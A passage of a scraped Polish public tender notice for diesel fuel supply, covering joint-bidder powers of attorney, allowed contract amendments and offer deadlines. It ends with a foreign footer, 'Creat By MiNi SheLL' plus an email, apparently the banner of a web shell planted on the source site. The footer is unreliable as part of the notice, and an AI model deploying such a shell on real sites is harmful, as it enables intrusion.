oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy ubiegający się wspólnie o zamówienie zobowiązani są zgodnie z art. 117 ust. 4 ustawy PZP do złożenia wraz z ofertą oświadczenia określającego jaki zakres zamówienia wykonają poszczególni Wykonawcy oraz ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Oferta tych Wykonawców powinna być podpisana przez ustanowionego Pełnomocnika, a do oferty należy dołączyć dokument lub pełnomocnictwo, z których wynika uprawnienie osoby (osób) do składania oświadczeń woli i reprezentowania Wykonawcy, jeżeli prawo to nie wynika z rejestru. Pełnomocnictwo powinno jednoznacznie określać zakres umocowania oraz wskazywać osobę pełnomocnika;<br/>2)	W przypadku podmiotów występujących wspólnie, w dokumencie pełnomocnictwa należy wskazać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia, a każdy z nich powinien złożyć podpis pod tym dokumentem; <br/>3)	Spółka cywilna ubiegająca się o udzielenie zamówienia wraz z ofertą przedkłada pełnomocnictwo lub dokument, z którego wynika w/w pełnomocnictwo, np. kopię umowy spółki cywilnej lub uchwałę – poświadczoną za zgodność z oryginałem; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany umowy na podstawie art. 455 ustawy PZP oraz w zakresie: <br/>1)	zwiększenia łącznego wynagrodzenia [netto i brutto], w przypadku, gdy suma poszczególnych dostaw nie wyczerpała szacowanej ilości oleju napędowego, a wyczerpała wartość umowy, wówczas za obopólną zgodą stron wartość umowy zostanie zwiększona w taki sposób, aby Wykonawca mógł wykonać zakres umowy w całości tj. zgodnie z szacowanym zapotrzebowaniem na olej napędowy na zasadach i według cen określonych w zawartej umowie. Wartość umowy będzie powiększona o iloczyn niewykorzystanej (niedostarczonej) ilości paliwa oraz ceny jednostkowej i rabatu zgodnych ze złożoną ofertą Wykonawcy.<br/>2)	zmiany terminu zakończenia wykonania zamówienia w sytuacji, gdyby Zamawiający nie złożył Wykonawcy w ciągu 12 miesięcy od daty podpisania umowy zapotrzebowania na ilość paliwa będącą przedmiotem zamówienia. Wówczas, po uzyskaniu obopólnej zgody na realizację dostaw na zasadach i według cen określonych w zawartej umowie, termin realizacji ulegnie zmianie aż do wyczerpania ilości wskazanej w SWZ, jednak nie dłużej niż do upływu 24 miesięcy od dnia zawarcia umowy. W przypadku, jeżeli Wykonawca nie wyrazi zgody na zmianę terminu realizacji umowy ulegnie ona rozwiązaniu, a Zamawiający zostanie zwolniony z obowiązku realizacji niewykorzystanej części umowy bez przysługiwania jakichkolwiek roszczeń z tego tytułu Wykonawcy, na co Wykonawca wyraża zgodę. W takim przypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu faktycznego wykonanych dostaw.<br/>3)	Zmiany wartości umowy brutto określonej w § 3 ust. 1 Umowy w przypadku zmiany stawki podatku VAT. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamowienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com